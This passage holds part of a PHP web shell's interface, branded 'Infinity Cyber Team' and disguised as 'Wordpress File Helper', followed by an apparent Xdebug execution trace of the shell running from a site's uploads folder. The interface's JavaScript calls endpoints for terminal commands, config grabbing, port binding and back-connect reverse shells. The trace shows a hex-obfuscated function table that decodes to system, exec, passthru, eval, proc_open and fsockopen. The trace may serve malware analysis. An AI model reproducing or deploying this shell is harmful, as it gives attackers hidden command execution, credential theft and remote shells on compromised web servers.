            echo $func[19]("Y-m-d h:i:s", $func[20]($item));
            ?></td>
													<td><?php 
            echo getowner($item);
            ?></td>
													<td><?php 
            echo checkPerm($dir . '/' . $item, perms($dir . '/' . $item));
            ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="<?php 
            echo $item;
            ?>"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-name="<?php 
            echo $item;
            ?>" onclick="getSource('<?php 
            echo $dir . '/' . $item;
            ?>', this)"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="<?php 
            echo $dir . '/' . $item;
            ?>"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="<?php 
            echo $dir . '/' . $item;
            ?>"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php 
        }
        ?>
										</tbody>
									</table>
								</div>
							<?php 
    } else {
        ?>
								<font class="text-danger">Can't read this directory!</font>
							<?php 
    }
    ?>
						<?php 
}
?>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						Copyright © Infinity Cyber Team <span class="float-end">Coded by <span class="text-muted">Bibib</span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="modal fade" id="renameModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="renameModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Rename</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="rename-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newname" class="col-form-label">New Name:</label>
		            <input type="text" class="form-control" name="newname" id="newname">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="chmodModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="chmodModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Change Permission</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="chmod-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newperm" class="col-form-label">New Permission:</label>
		            <input type="text" class="form-control" name="perm" id="newperm">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="deleteModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Delete</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to delete this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="delete-confirm">Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="downloadModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Download</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to download this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="download-confirm" download>Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="viewModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">View</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form action="" method="post">
		      <div class="modal-body">
		        <div class="mb-3">
	            <label for="content" class="col-form-label">Content:</label>
	            <textarea class="form-control" id="content" rows="15" name="content"></textarea>
	          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4" crossorigin="anonymous"></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var chmodModal = document.getElementById('chmodModal')
		var deleteModal = document.getElementById('deleteModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "oldname";
			document.getElementById("rename-form").appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		chmodModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var perm = button.getAttribute('data-bs-perm')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = chmodModal.querySelector('.modal-title')
			var modalBodyInput = chmodModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "filename";
			document.getElementById("chmod-form").appendChild(hiddenInput);
			
			modalBodyInput.value = perm
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = file
		})
		
		function getSource(filename, d) {
			fetch(window.location.pathname + '?do=get-source&filename=' + filename)
			.then(res => res.text())
			.then(function(data) {
				var viewModal = document.getElementById('viewModal')
				var myModal = new bootstrap.Modal(viewModal)
				var name = d.getAttribute('data-bs-name')
				var modalTitle = viewModal.querySelector('.modal-title')
				var modalContent = viewModal.querySelector('.modal-body textarea')
				var hiddenInput = document.createElement('input')
				hiddenInput.type = "hidden";
				hiddenInput.value = name;
				hiddenInput.name = "filename";
				viewModal.querySelector("form").appendChild(hiddenInput);
	
				modalTitle.textContent = 'Edit ' + name
				modalContent.value = data
				myModal.show(viewModal)
			})
		}
		
		function terminal(e) {
			var cmd = e.value;
			fetch(window.location.pathname + '?do=terminal&command=' + cmd)
			.then(res => res.text())
			.then(function(data) {
				var termRes = document.getElementById('terminal-res');
				termRes.innerHTML = data
				e.value = ''
			})
		}
		
		function jumping(e) {
			fetch(window.location.pathname + '?do=jumping')
			.then(res => res.text())
			.then(function(data) {
				var jumpRes = document.getElementById('jumping-res');
				jumpRes.innerHTML = data
			})
		}
		
		function getConfig(e) {
			fetch(window.location.pathname + '?do=get-config')
			.then(res => res.text())
			.then(function(data) {
				var confRes = document.getElementById('config-res');
				confRes.innerHTML = data
			})
		}
		
		function bindPort(e) {
			var port = document.getElementById('bind-port').value
			fetch(window.location.pathname + '?do=bind-port&port=' + port)
			.then(res => res.text())
			.then(function(data) {
				var netRes = document.getElementById('network-res');
				netRes.innerHTML = data
			})
		}
		
		function backConnect(e) {
			var host = document.getElementById('bc-host').value
			var port = document.getElementById('bc-port').value
			var within = document.getElementById('bc-with').value
			fetch(window.location.pathname + '?do=back-connect&host='+host+'&port='+port+'&with='+within)
			.then(res => res.text())
			.then(function(data) {
				var netRes = document.getElementById('network-res');
				netRes.innerHTML = data
			})
		}
		
	</script>
</body>
</html>

Execution traces

data/traces/fe48a2bd0d2c4060ff976ec41e0cdc3c_trace-1676250662.8461.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:11:28.743950]
1	0	1	0.000154	393512
1	3	0	0.001524	711472	{main}	1		/var/www/html/uploads/1CTT.php	0	0
1		A						/var/www/html/uploads/1CTT.php	3	$shellName = 'Wordpress File Helper'
1		A						/var/www/html/uploads/1CTT.php	4	$logo = 'https://image.flaticon.com/icons/png/512/2959/2959607.png'
1		A						/var/www/html/uploads/1CTT.php	5	$func = [0 => '7068705f756e616d65', 1 => '70687076657273696f6e', 2 => '676574637764', 3 => '6368646972', 4 => '707265675f73706c6974', 5 => '61727261795f64696666', 6 => '69735f646972', 7 => '69735f66696c65', 8 => '69735f7772697461626c65', 9 => '69735f7265616461626c65', 10 => '66696c6573697a65', 11 => '636f7079', 12 => '66696c655f657869737473', 13 => '66696c655f7075745f636f6e74656e7473', 14 => '66696c655f6765745f636f6e74656e7473', 15 => '6d6b646972', 16 => '72656e616d65', 17 => '737472746f74696d65', 18 => '68746d6c7370656369616c6368617273', 19 => '64617465', 20 => '66696c656d74696d65', 21 => '7363616e646972', 22 => '73797374656d', 23 => '65786563', 24 => '7061737374687275', 25 => '7368656c6c5f65786563', 26 => '6f625f6765745f636f6e74656e7473', 27 => '6f625f656e645f636c65616e', 28 => '6469726e616d65', 29 => '6469736b5f746f74616c5f7370616365', 30 => '6469736b5f667265655f7370616365', 31 => '696e695f676574', 32 => '707265675f6d617463685f616c6c', 33 => '706f7369785f6765747077756964', 34 => '706f7369785f6765746772676964', 35 => '70617468696e666f', 36 => '66696c656f776e6572', 37 => '66696c6567726f7570', 38 => '66696c6574797065', 39 => '676574686f73746e616d65', 40 => '676574686f737462796e616d65', 41 => '737562737472', 42 => '737472737472', 43 => '696e695f736574', 44 => '66696c65', 45 => '7374725f7265706c616365', 46 => '6578706c6f6465', 47 => '6576616c', 48 => '6f625f7374617274', 49 => '66756e6374696f6e5f657869737473', 50 => '6572726f725f7265706f7274696e67', 51 => '7365745f74696d655f6c696d6974', 52 => '636c656172737461746361636865', 53 => '646174655f64656661756c745f74696d657a6f6e655f736574', 54 => '666c757368', 55 => '7374726c656e', 56 => '7472696d', 57 => '656d707479', 58 => '6973736574', 59 => '66696c657065726d73', 60 => '7374726c656e', 61 => '636f756e74', 62 => '726f756e64', 63 => '6d696d655f636f6e74656e745f74797065', 64 => '6765745f63757272656e745f75736572', 65 => '6765746d79756964', 66 => '6765746d79676964', 67 => '706f7369785f67657465756964', 68 => '706f7369785f67657465676964', 69 => '616464736c6173686573', 70 => '73796d6c696e6b', 71 => '726d646972', 72 => '756e6c696e6b', 73 => '61727261795f6d6170', 74 => '676c6f62', 75 => '686561646572', 76 => '706f70656e', 77 => '69735f7265736f75726365', 78 => '66656f66', 79 => '6672656164', 80 => '70636c6f7365', 81 => '70726f635f6f70656e', 82 => '73747265616d5f6765745f636f6e74656e7473', 83 => '636c6173735f657869737473', 84 => '737072696e7466', 85 => '63686d6f64', 86 => '666f70656e', 87 => '667772697465', 88 => '6261736536345f6465636f6465', 89 => '66736f636b6f70656e', 90 => '6670757473', 91 => '6667657473', 92 => '66636c6f7365']
1		A						/var/www/html/uploads/1CTT.php	6	$i = 0
2	4	0	0.001693	711472	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7068705f756e616d65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	5	0	0.001739	711504	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	5	1	0.001752	711552
3	5	R			112
3	6	0	0.001764	711472	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	6	1	0.001776	711512
3	6	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	7	0	0.001810	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	7	1	0.001822	711584
3	7	R			104
3	8	0	0.001834	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	8	1	0.001845	711544
3	8	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	9	0	0.001877	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	9	1	0.001888	711584
3	9	R			112
3	10	0	0.001900	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	10	1	0.001911	711544
3	10	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	11	0	0.001942	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	11	1	0.001953	711584
3	11	R			95
3	12	0	0.001965	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	12	1	0.001976	711544
3	12	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	13	0	0.002007	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	13	1	0.002019	711584
3	13	R			117
3	14	0	0.002031	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	14	1	0.002043	711544
3	14	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	15	0	0.002073	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	15	1	0.002084	711584
3	15	R			110
3	16	0	0.002096	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	16	1	0.002107	711544
3	16	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	17	0	0.002137	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	17	1	0.002148	711584
3	17	R			97
3	18	0	0.002160	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	18	1	0.002171	711544
3	18	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	19	0	0.002206	711536	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	19	1	0.002218	711584
3	19	R			109
3	20	0	0.002230	711504	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	20	1	0.002241	711544
3	20	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	21	0	0.002270	711544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	21	1	0.002282	711592
3	21	R			101
3	22	0	0.002294	711512	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	22	1	0.002306	711552
3	22	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	4	1	0.002335	711512
2	4	R			'php_uname'
1		A						/var/www/html/uploads/1CTT.php	7	$func[0] = 'php_uname'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	23	0	0.002370	719760	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'70687076657273696f6e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 19
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	24	0	0.002411	719792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	24	1	0.002423	719840
3	24	R			112
3	25	0	0.002435	719760	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	25	1	0.002446	719800
3	25	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	26	0	0.002477	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	26	1	0.002488	719872
3	26	R			104
3	27	0	0.002500	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	27	1	0.002511	719832
3	27	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	28	0	0.002541	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	28	1	0.002552	719872
3	28	R			112
3	29	0	0.002563	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	29	1	0.002575	719832
3	29	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	30	0	0.002604	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'76'
3	30	1	0.002626	719872
3	30	R			118
3	31	0	0.002640	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	118
3	31	1	0.002652	719832
3	31	R			'v'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'v'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	32	0	0.002683	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	32	1	0.002694	719872
3	32	R			101
3	33	0	0.002706	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	33	1	0.002717	719832
3	33	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	34	0	0.002747	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	34	1	0.002759	719872
3	34	R			114
3	35	0	0.002771	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	35	1	0.002782	719832
3	35	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	36	0	0.002812	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	36	1	0.002823	719872
3	36	R			115
3	37	0	0.002835	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	37	1	0.002846	719832
3	37	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	38	0	0.002876	719824	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	38	1	0.002887	719872
3	38	R			105
3	39	0	0.002899	719792	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	39	1	0.002910	719832
3	39	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	40	0	0.002944	719832	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	40	1	0.002956	719880
3	40	R			111
3	41	0	0.002969	719800	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	41	1	0.002980	719840
3	41	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	42	0	0.003010	719832	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	42	1	0.003021	719880
3	42	R			110
3	43	0	0.003034	719800	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	43	1	0.003045	719840
3	43	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	23	1	0.003075	719800
2	23	R			'phpversion'
1		A						/var/www/html/uploads/1CTT.php	7	$func[1] = 'phpversion'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	44	0	0.003109	719800	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'676574637764'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	45	0	0.003149	719832	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	45	1	0.003160	719880
3	45	R			103
3	46	0	0.003173	719800	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	46	1	0.003185	719840
3	46	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	47	0	0.003216	719864	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	47	1	0.003227	719912
3	47	R			101
3	48	0	0.003239	719832	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	48	1	0.003250	719872
3	48	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	49	0	0.003281	719864	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	49	1	0.003292	719912
3	49	R			116
3	50	0	0.003304	719832	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	50	1	0.003315	719872
3	50	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	51	0	0.003345	719864	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	51	1	0.003356	719912
3	51	R			99
3	52	0	0.003368	719832	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	52	1	0.003380	719872
3	52	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	53	0	0.003409	719864	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'77'
3	53	1	0.003420	719912
3	53	R			119
3	54	0	0.003433	719832	chr	0		/var/www/html/uploads/1CTT.php	204	1	119
3	54	1	0.003444	719872
3	54	R			'w'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	55	0	0.003474	719864	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	55	1	0.003485	719912
3	55	R			100
3	56	0	0.003497	719832	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	56	1	0.003509	719872
3	56	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	44	1	0.003546	719832
2	44	R			'getcwd'
1		A						/var/www/html/uploads/1CTT.php	7	$func[2] = 'getcwd'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	57	0	0.003591	719832	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6368646972'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	58	0	0.003645	719864	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	58	1	0.003660	719912
3	58	R			99
3	59	0	0.003677	719832	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	59	1	0.003691	719872
3	59	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	60	0	0.003738	719896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	60	1	0.003753	719944
3	60	R			104
3	61	0	0.003770	719864	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	61	1	0.003785	719904
3	61	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	62	0	0.003827	719896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	62	1	0.003842	719944
3	62	R			100
3	63	0	0.003859	719864	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	63	1	0.003874	719904
3	63	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	64	0	0.003916	719896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	64	1	0.003930	719944
3	64	R			105
3	65	0	0.003968	719864	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	65	1	0.003983	719904
3	65	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	66	0	0.004027	719896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	66	1	0.004041	719944
3	66	R			114
3	67	0	0.004058	719864	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	67	1	0.004073	719904
3	67	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	57	1	0.004115	719864
2	57	R			'chdir'
1		A						/var/www/html/uploads/1CTT.php	7	$func[3] = 'chdir'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	68	0	0.004160	719864	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'707265675f73706c6974'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 19
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	69	0	0.004215	719896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	69	1	0.004230	719944
3	69	R			112
3	70	0	0.004245	719864	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	70	1	0.004259	719904
3	70	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	71	0	0.004302	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	71	1	0.004317	719976
3	71	R			114
3	72	0	0.004334	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	72	1	0.004349	719936
3	72	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	73	0	0.004391	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	73	1	0.004405	719976
3	73	R			101
3	74	0	0.004422	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	74	1	0.004438	719936
3	74	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	75	0	0.004480	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	75	1	0.004495	719976
3	75	R			103
3	76	0	0.004511	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	76	1	0.004527	719936
3	76	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	77	0	0.004566	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	77	1	0.004581	719976
3	77	R			95
3	78	0	0.004598	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	78	1	0.004612	719936
3	78	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	79	0	0.004650	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	79	1	0.004663	719976
3	79	R			115
3	80	0	0.004679	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	80	1	0.004692	719936
3	80	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	81	0	0.004745	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	81	1	0.004759	719976
3	81	R			112
3	82	0	0.004775	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	82	1	0.004789	719936
3	82	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	83	0	0.004826	719928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	83	1	0.004840	719976
3	83	R			108
3	84	0	0.004861	719896	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	84	1	0.004877	719936
3	84	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	85	0	0.004914	719936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	85	1	0.004930	719984
3	85	R			105
3	86	0	0.004952	719904	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	86	1	0.004967	719944
3	86	R			'i'
